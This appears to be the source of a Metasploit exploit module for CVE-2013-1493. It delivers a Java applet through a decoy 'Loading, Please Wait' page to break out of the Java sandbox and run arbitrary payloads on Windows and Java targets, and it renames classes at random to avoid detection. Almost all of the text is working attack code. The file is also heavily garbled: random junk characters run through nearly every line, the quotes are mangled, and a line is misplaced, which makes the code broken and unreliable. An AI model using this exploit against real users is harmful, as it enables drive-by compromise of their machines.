##" n: z' H( s* o: w2 B$ {7 F
5 h, `$ M6 |/ T# This file is part of the Metasploit Framework and may be subject to3 _! a1 ^8 B/ a
# redistribution and commercial restrictions. Please see the Metasploit. g' i' D0 V3 W/ W: l
# web site for more information on licensing and terms of use.+ v' i9 v" d( z. F' p+ |1 u
# http://metasploit.com/
( J# R+ K5 F# ]( s- `, G##
$ J. ?& I: x* O) Y* |) ~9 Hrequire ‘msf/core’
. M7 b9 a: ^" W% ]( Orequire ‘rex’0 ^$ z* ]1 _) b
class Metasploit3 < Msf::Exploit::Remote, h$ `' i' ~8 @& X, Q9 R8 E
Rank = NormalRanking
1 y+ ?4 |6 e+ J, u! W1 u1 l8 Rinclude Msf::Exploit::Remote::HttpServer::HTML
" R" |# m# l! }include Msf::Exploit::EXE+ J: H6 k4 N }3 Q5 l P
include Msf::Exploit::Remote::BrowserAutopwn2 ~ q+ v; i# j! S
autopwn_info({ :javascript => false })
1 }( e- t; C# A0 i' _6 odef initialize( info = {} )
) ~( k2 r8 `# Z. |7 M' c' gsuper( update_info( info,9 ~" n. m% D: r
‘Name’ => ‘Java CMM Remote Code Execution’,. o' \* V% M2 r
‘Description’ => %q{
1 M. a O, e8 R# S! z6 g) Y% t/ y) AThis module abuses the Color Management classes from a Java Applet to run( f2 w. a* @- u
arbitrary Java code outside of the sandbox as exploited in the wild in February/ w, Q& S3 f6 C' F- I
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
0 K+ C% a2 m2 Uand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
6 @$ u6 }+ N2 s/ i) Dsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
! v' [& Q3 ]6 w6 A6 Awarning in order to run the malicious applet.+ }4 D0 L0 H: O5 C) O V
},, C. g# o& t9 x+ R$ E# s- w! g% G
‘License’ => MSF_LICENSE,8 D6 L+ o$ ?/ a8 k
‘Author’ =>$ f; Y3 o- R" H0 e4 [# k& y
'Unknown', # Vulnerability discovery and Exploit
2 |/ N0 N; A" d- R: ^'juan vazquez' # Metasploit module (just ported the published exploit)
# P6 r. U; y0 @0 r9 ~1 G],! y0 w4 a' y ^
‘References’ =>
. h! L. F. z6 R1 E# f* K[" E, O3 m* m% d6 M( V
[ 'CVE', '2013-1493' ],) E) T/ f8 [. I% }5 r1 B
[ 'OSVDB', '90737' ],
( r7 s# p8 Y5 R- k5 W% Q. u5 e: ?[ 'BID', '58238' ],
" _9 k& {# A) g i! o* ]$ c9 ~[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],9 ^* ] z) v( q- b( ^% K
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 e2 e W. w! n$ @[ 'URL', 'http://pastie.org/pastes/6581034' ]% Q/ z- P5 _0 v6 v0 I) R
],
1 F2 o+ o# y8 C. i( W, v# ?( y‘Platform’ => [ 'win', 'java' ],
5 [# Q d0 t4 c& l7 j‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },5 X {3 m) r9 ]
‘Targets’ =>4 I- i4 m5 z5 C; x8 B
[) A" w' I5 I# S" l% T
[ 'Generic (Java Payload)',
p) D( Z& s! g{
: ^: y: A! _0 i'Platform' => 'java',' i2 ]3 w4 ]: i! \9 t: X2 X" h
'Arch' => ARCH_JAVA; n3 G& u4 k7 y+ Z- |$ @
}
4 F1 r) m% q9 v7 I],
3 w# U7 d4 G, M1 A R& m[ 'Windows x86 (Native Payload)',5 }, L9 q0 y' k
{
. Y& x4 t/ U6 H+ K# H'Platform' => 'win',( i0 b+ h. z J- u1 S9 L4 V
'Arch' => ARCH_X868 e; E0 J1 n0 n/ G6 U7 f, S# A" G
}9 |+ f1 T' E. v8 {: C
]
& o! F9 ~6 v8 }, k5 M],
# \7 _9 Y, [: m2 u+ ]- \ q* J8 A‘‘DisclosureDate’ => ‘Mar 01 2013′
) e9 E* K/ n( W8 b" ^7 V! Q7 h)). ^2 v: L, S V# |- g& o
end1 f H0 R) R' C: Y- c
def setup
. y9 n% P/ L& {% o: @2 \- Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
( l" a4 k+ r2 }5 f; E. `$ y8 W+ Y, k@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! z; j6 }7 q, w* k# r* w# M9 t
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
5 N+ }* j5 k% S2 ^9 C@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& Q; M+ D+ C# Wpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
- |* U. G; w6 ~" b@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 n- W1 n# E2 opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
9 u( C ` T3 q; h@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) } M! {1 j7 Z5 o! N0 M9 f& C
@init_class_name = rand_text_alpha(“Init”.length)( P1 p2 }! I2 t& e8 Q" C
@init_class.gsub!(“Init”, @init_class_name)
7 \% W3 _9 @: D: |: b Z) rsuper- W2 z( {- S0 w( L$ o
end
; W9 n" W7 ^' w0 H1 E; Odef on_request_uri(cli, request)
) z- k q: @7 ^! Dprint_status(“handling request for #{request.uri}”)6 q5 I9 J6 K! e, u$ P" O
case request.uri; K+ j K5 I" R- t9 B: Q
when /\.jar$/i" N; [/ t# `- k1 z) c+ u
jar = payload.encoded_jar
& r$ }! o, h1 J: i4 K7 Rjar.add_file(“#{@init_class_name}.class”, @init_class)
( H7 L, q$ p \% ~, D Vjar.add_file(“Leak.class”, @leak_class)
+ \! c1 ]1 p' E$ f1 z# @jar.add_file(“MyBufferedImage.class”, @buffered_image_class)) c' R$ {4 ^0 U( A# `
jar.add_file(“MyColorSpace.class”, @color_space_class)
2 g& t- U. p- |! u$ f2 ^. oDefaultTarget’ => 1,
8 o1 N; B& C2 c) lmetasploit_str = rand_text_alpha(“metasploit”.length)
7 K4 O* A4 r# t; ~. v) Fpayload_str = rand_text_alpha(“payload”.length)
; }2 ]$ b5 D1 ujar.entries.each { |entry|" M: ?1 V4 {) S$ | P
entry.name.gsub!(“metasploit”, metasploit_str)
; Y4 |8 \ x Z* i9 |entry.name.gsub!(“Payload”, payload_str)2 o! J4 M" F; f
entry.data = entry.data.gsub(“metasploit”, metasploit_str)5 _* J2 R6 I0 ^5 v8 K# t* M
entry.data = entry.data.gsub(“Payload”, payload_str)
# d1 b& A3 j& G+ x1 Q1 z4 u}
9 k* y/ i8 E Ejar.build_manifest
3 ^' P! k: s+ ^: _2 B csend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
- ^, d- {2 J( Y# Iwhen /\/$/4 y* k% v2 _% @( l8 \5 b
payload = regenerate_payload(cli)) M- @" B$ X4 v6 P0 X# M' G
if not payload
3 Y5 u* ?2 i$ T/ E) M' xprint_error(“Failed to generate the payload.”)6 [2 E6 T. y2 E5 X }; q$ \
send_not_found(cli)
1 n1 U4 J/ \. u% Z* Dreturn
" B. Q3 c1 H* }0 s9 ~0 b8 Hend: d1 n7 r' W. K) a3 Q( ~) x
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
8 j, I5 }6 l4 f* J7 X9 a" B9 \, [else
' A9 x3 L" u9 R% q- @ isend_redirect(cli, get_resource() + ‘/’, ”)
7 b: S* n9 `. q5 f( iend
# @& ^7 z, |3 zend8 z' O0 i8 f1 \$ }* l; S$ a
def generate_html
/ L R, m- Z& H# uhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
7 t3 f9 t( V8 O4 C4 Y7 ?1 _html += %Q|<body><center><p>Loading, Please Wait…</p></center>|/ G3 i1 Q5 h, U7 R+ U* g
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
: Z9 x3 n$ c, d$ ^2 U* D( nhtml += %Q|</applet></body></html>|
) _1 L9 I2 B) b$ [4 a6 Rreturn html
: M4 G( t+ M2 j% E' [( i6 e7 s$ L9 }end& [# Z H2 t: Z5 D" G6 O
end
\6 R' w* T6 A2 K. L! \- A- nend4 \+ z: S$ Q6 k# J! Y0 y7 }
|